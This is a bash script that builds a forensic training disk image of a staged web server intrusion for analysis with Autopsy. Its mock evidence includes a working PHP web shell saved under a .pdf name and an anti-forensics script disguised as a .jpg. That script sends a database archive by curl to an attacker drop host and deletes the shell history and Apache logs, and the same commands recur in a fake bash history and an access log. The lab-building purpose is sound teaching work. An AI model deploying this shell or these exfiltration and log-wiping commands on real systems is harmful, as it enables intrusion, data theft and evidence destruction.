#!/bin/bash
# ==============================================================================
# OPERATION WEB intrusion - AUTOMATED FORENSIC LAB SETUP SCRIPT
# Server Intrusion & Anti-Forensics Analysis (Linux Local Loopback)
# ==============================================================================

# Ensure script is run as root
if [ "$EUID" -ne 0 ]; then
  echo -e "\e[31m[!] Please run this script as root (use: sudo ./automate_lab.sh)\e[0m"
  exit 1
fi

echo -e "\e[34m"
echo "================================================================="
echo "       ACEP Tech - Web Server Intrusion Evidence Generator       "
echo "               Scenario: Operation Web Intrusion                 "
echo "               (100% Linux Local Virtual Disk)                   "
echo "================================================================="
echo -e "\e[0m"

# Step 1: Install basic dependencies
echo -e "\e[32m[*] Step 1: Installing required tools (zip, wget, python3)...\e[0m"
apt-get update -y && apt-get install -y zip wget python3

# Step 2: Create local workspace
echo -e "\n\e[32m[*] Step 2: Preparing workspace folders...\e[0m"
WORKDIR="/tmp/forensics_build"
rm -rf "$WORKDIR"
mkdir -p "$WORKDIR/files"
cd "$WORKDIR"

# Step 3: Generate the mock evidence files (Hacker exploit)
echo -e "\n\e[32m[*] Step 3: Creating server files and malicious evidence...\e[0m"

# A. Decoy Corporate Web Files
echo "[*] Creating standard corporate site files..."
cat << 'EOF' > files/index.html
<!DOCTYPE html>
<html>
<head>
    <title>ACEP Tech - Enterprise Cloud Solutions</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <header>
        <h1>ACEP Tech</h1>
        <p>Innovating Secure Infrastructure Systems</p>
    </header>
    <main>
        <h3>Client Portal Login</h3>
        <p>Access is restricted to authorized personnel only.</p>
    </main>
</body>
</html>
EOF

cat << 'EOF' > files/styles.css
body { font-family: Arial, sans-serif; background-color: #f4f4f9; text-align: center; padding: 50px; }
header { background: #333; color: #fff; padding: 10px; border-radius: 5px; }
main { margin-top: 20px; background: white; padding: 20px; border: 1px solid #ddd; display: inline-block; }
EOF

# B. Download small decoy image
wget -q -O files/logo.png "https://upload.wikimedia.org/wikipedia/commons/e/e4/Small-logo.png"
if [ ! -f files/logo.png ]; then
  echo "Fallback Logo Content" > files/logo.png
fi

# C. Web Shell disguised as PDF (invoice.pdf) - This will be deleted
echo "[*] Creating PHP Web Shell backdoor disguised as PDF (invoice.pdf)..."
cat << 'EOF' > files/invoice.pdf
<?php
# PHP Backdoor Shell disguised as PDF to bypass upload security filters
# Target Server misconfiguration parsed PDF files containing PHP code.
if (isset($_GET['action']) && $_GET['action'] == 'execute') {
    if (isset($_GET['cmd'])) {
        echo "<pre>";
        system($_GET['cmd']);
        echo "</pre>";
    }
}
?>
EOF

# D. Stolen Database Dump - This will be generated by the hacker and then deleted
echo "[*] Creating SQL database dump..."
cat << 'EOF' > files/customers.sql
-- ACEP TECH COMPANY INTERNAL DATABASE DUMP
-- EXFILTRATED DATA - CLASS: RESTRICTED CLIENT DATA
-- DATE GENERATED: 2026-06-23 14:26:05

CREATE TABLE client_secrets (
    secret_id INT PRIMARY KEY,
    confidential_code VARCHAR(100),
    owner_email VARCHAR(100)
);

INSERT INTO client_secrets VALUES (1, 'ACEP_TECH_CONFIDENTIAL_ALGORITHM_V1', 'client_secrets@acep.local');
EOF

# E. Shell script disguised as a JPG image (File Extension Mismatch)
echo "[*] Packaging log cleaner utility disguised as banner.jpg..."
cat << 'EOF' > files/banner.jpg
#!/bin/bash
# Cleaner utility script used by attacker to execute anti-forensics
# Disguised with a .jpg extension to bypass security scanner inspections.

# 1. Package exfiltrated databases
tar -czf uploads/system_cache.tar.gz customers.sql

# 2. Upload database archive to attacker drop server
curl -F "data=@uploads/system_cache.tar.gz" http://192.168.1.200/incoming/upload.php

# 3. Clean environment logs
history -c
rm -f /var/log/apache2/access.log
rm -f /var/log/apache2/error.log
rm -f /home/web_admin/.bash_history

# 4. Remove active trace files
rm -f invoice.pdf
rm -f customers.sql
EOF

# F. Attacker Command History (.bash_history) - This will be deleted
echo "[*] Drafting command execution history..."
cat << 'EOF' > files/.bash_history
cd /var/www/html
ls -la
whoami
cat /etc/passwd | grep web_admin
mysql -u root -p -e "show databases;"
mysqldump -u root -p acep_db client_secrets > customers.sql
tar -czf uploads/system_cache.tar.gz customers.sql
curl -F "data=@uploads/system_cache.tar.gz" http://192.168.1.200/incoming/upload.php
echo "<?php system(\$_GET['cmd']); ?>" > invoice.pdf
chmod +x cleaner.sh
./cleaner.sh
mv cleaner.sh banner.jpg
rm -f invoice.pdf
rm -f customers.sql
rm -f /var/log/apache2/access.log
exit
EOF

# G. Web Access Log (server logs capturing the exploit) - This will be deleted
echo "[*] Generating apache access logs..."
cat << 'EOF' > files/access.log
192.168.1.50 - - [23/Jun/2026:10:15:30 +0000] "GET /index.html HTTP/1.1" 200 4502
192.168.1.50 - - [23/Jun/2026:10:15:35 +0000] "GET /styles.css HTTP/1.1" 200 1204
192.168.1.142 - - [23/Jun/2026:14:22:10 +0000] "GET /index.html HTTP/1.1" 200 4502
192.168.1.142 - - [23/Jun/2026:14:25:12 +0000] "GET /invoice.pdf?action=execute&cmd=whoami HTTP/1.1" 200 34
192.168.1.142 - - [23/Jun/2026:14:26:05 +0000] "GET /invoice.pdf?action=execute&cmd=mysqldump+-u+root+-p+acep_db+client_secrets+>+customers.sql HTTP/1.1" 200 0
192.168.1.142 - - [23/Jun/2026:14:27:11 +0000] "GET /invoice.pdf?action=execute&cmd=curl+-F+%22data%3D%40system_cache.tar.gz%22+http%3A%2F%2F192.168.1.200%2Fincoming%2Fupload.php HTTP/1.1" 200 220
192.168.1.142 - - [23/Jun/2026:14:29:45 +0000] "GET /invoice.pdf?action=execute&cmd=rm+customers.sql HTTP/1.1" 200 0
192.168.1.142 - - [23/Jun/2026:14:30:00 +0000] "GET /invoice.pdf?action=execute&cmd=mv+cleaner.sh+banner.jpg HTTP/1.1" 200 0
192.168.1.142 - - [23/Jun/2026:14:31:15 +0000] "GET /invoice.pdf?action=execute&cmd=rm+invoice.pdf HTTP/1.1" 200 0
EOF


# Step 4: Create loopback virtual disk image
echo -e "\n\e[32m[*] Step 4: Building loopback virtual server disk (500MB FAT32)...\e[0m"
RAW_IMG="evidence.raw"

# Create a 500MB empty file filled with zeros
dd if=/dev/zero of="$RAW_IMG" bs=1M count=500 status=none

# Format the raw file directly as FAT32 filesystem
mkfs.vfat -F 32 -n "ACEP_SERVER" "$RAW_IMG"

# Mount the virtual disk image locally
MNT_DIR="/mnt/virtual_disk"
mkdir -p "$MNT_DIR"
mount -o loop "$RAW_IMG" "$MNT_DIR"

# Copy all generated files
cp -r files/. "$MNT_DIR/"

# Set realistic timestamps
find "$MNT_DIR/" -exec touch -d "2026-06-23 14:30:00" {} \;

# Sync and delete files to simulate anti-forensics clearing
sync
echo "[*] Simulating anti-forensics actions (deleting evidence files)..."
rm "$MNT_DIR/invoice.pdf"
rm "$MNT_DIR/customers.sql"
rm "$MNT_DIR/.bash_history"
rm "$MNT_DIR/access.log"
sync

# Unmount the image
umount "$MNT_DIR"
rmdir "$MNT_DIR"

# Step 5: Save output and generate hashes
echo -e "\n\e[32m[*] Step 5: Finalizing disk image and generating hashes...\e[0m"
OUTPUT_DIR="/home/kali/Desktop"
if [ ! -d "$OUTPUT_DIR" ]; then
  OUTPUT_DIR="/home/$(logname)/Desktop"
fi
if [ ! -d "$OUTPUT_DIR" ]; then
  OUTPUT_DIR="/tmp"
fi

mv "$RAW_IMG" "$OUTPUT_DIR/"
chown $(logname):$(logname) "$OUTPUT_DIR/evidence.raw" 2>/dev/null

md5sum "$OUTPUT_DIR/evidence.raw" > "$OUTPUT_DIR/evidence.raw.md5"
sha256sum "$OUTPUT_DIR/evidence.raw" > "$OUTPUT_DIR/evidence.raw.sha256"

# Cleanup local workspace
rm -rf "$WORKDIR"

echo -e "\n\e[34m================================================================="
echo "            SERVER INTRUSION LAB SETUP COMPLETED SUCCESSFULY!    "
echo "=================================================================\e[0m"
echo -e "Virtual Disk Image Location : \e[33m$OUTPUT_DIR/evidence.raw\e[0m"
echo -e "MD5 Hash File               : \e[33m$OUTPUT_DIR/evidence.raw.md5\e[0m"
echo -e "SHA256 Hash File            : \e[33m$OUTPUT_DIR/evidence.raw.sha256\e[0m"
echo ""
echo "Calculated Hashes:"
echo -n "MD5:    " && cat "$OUTPUT_DIR/evidence.raw.md5"
echo -n "SHA256: " && cat "$OUTPUT_DIR/evidence.raw.sha256"
echo "------------------------------------------------------------"
echo "What to do next:"
echo "1. The 'evidence.raw' is located on your Kali Desktop."
echo "2. Open Autopsy on Kali Linux using: sudo autopsy"
echo "3. Use the 6-phase Forensic Manual with Autopsy to run the lab."
echo "================================================================="
